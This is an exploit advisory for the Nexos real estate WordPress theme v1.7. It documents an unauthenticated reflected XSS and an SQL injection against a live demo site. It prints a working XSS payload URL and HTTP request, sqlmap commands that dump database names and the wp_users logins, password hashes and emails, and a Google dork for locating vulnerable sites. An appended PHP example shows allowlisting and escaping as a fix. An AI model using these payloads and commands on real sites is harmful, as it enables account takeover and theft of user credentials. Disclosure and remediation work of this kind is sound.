Nexos - Real Estate WordPress Theme v1.7 - Multiple Vulnerabilities

2020.06.29
Risk: Medium
Local: No
Remote: Yes

[+] Exploit Title: Nexos - Real Estate WordPress Theme v1.7 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/nexos/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
[+] Software Version: 1.7
[+] Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
[+] Tested on: Debian 10
[+] CVE: CVE-2020-15363, CVE-2020-15364
[+] CWE: CWE-79, CWE-89

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS
[x] SQL Injection

### [ PoC Unauthenticated Reflected XSS: ]

[!] https://listing-themes.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>

[!] GET /nexos-wp/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
    Host: listing-themes.com

### [ PoC SQL Injection: ]

[!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema

[!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: geniuscr_nexos
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+
| user_login   | user_pass                          | user_email              |
+--------------+------------------------------------+-------------------------+

### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

References:

https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
https://raw.githubusercontent.com/vladvector/vladvector.github.io/master/exploit/2020-06-17-nexos-real-estate-wordpress-theme-v1-7.txt
https://twitter.com/vlad_vector
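
An added example (not from the advisory and not the theme's own code) of handling the two parameters named above safely in plain PHP. It assumes the theme places `search_order` into an ORDER BY clause and echoes `search_location` into an HTML attribute; the function names and the `price` column are hypothetical.

```php
<?php
// Added example: hypothetical handlers, not the Nexos theme's code.

// Assumption: the sortable columns and their SQL names. Only "idlisting"
// appears in the advisory; "price" is a constructed placeholder.
const SORT_COLUMNS = [
    'idlisting' => 'idlisting',
    'price'     => 'price',
];

/**
 * Map a search_order value such as "idlisting DESC" onto an ORDER BY clause
 * built only from allowlisted tokens. Anything else gets the default.
 */
function order_by_clause(string $raw): string
{
    $default = 'idlisting DESC';
    // Exactly "<identifier> <ASC|DESC>", nothing before or after.
    if (!preg_match('/\A([a-z_]{1,32}) (ASC|DESC)\z/i', trim($raw), $m)) {
        return $default;
    }
    $column = strtolower($m[1]);
    if (!isset(SORT_COLUMNS[$column])) {
        return $default;
    }
    // Emit our own constants, never the bytes taken from the request.
    return SORT_COLUMNS[$column] . ' ' . strtoupper($m[2]);
}

/** Encode search_location for an HTML attribute (in WordPress: esc_attr()). */
function attr(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs modelled on the parameters named in the advisory.
$samples = [
    'idlisting DESC',              // accepted as-is
    'idlisting DESC, (SELECT 1)',  // extra SQL after the direction: default
    'user_pass ASC',               // column not on the allowlist: default
];
foreach ($samples as $s) {
    printf("%-30s => ORDER BY %s\n", $s, order_by_clause($s));
}
echo '<input name="search_location" value="' . attr('"><img src=x>') . '">', "\n";
```

ORDER BY identifiers cannot be bound as prepared-statement parameters, which is why the sort value is resolved through an allowlist rather than escaped.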


Copyright 2020, cxsecurity.com

 
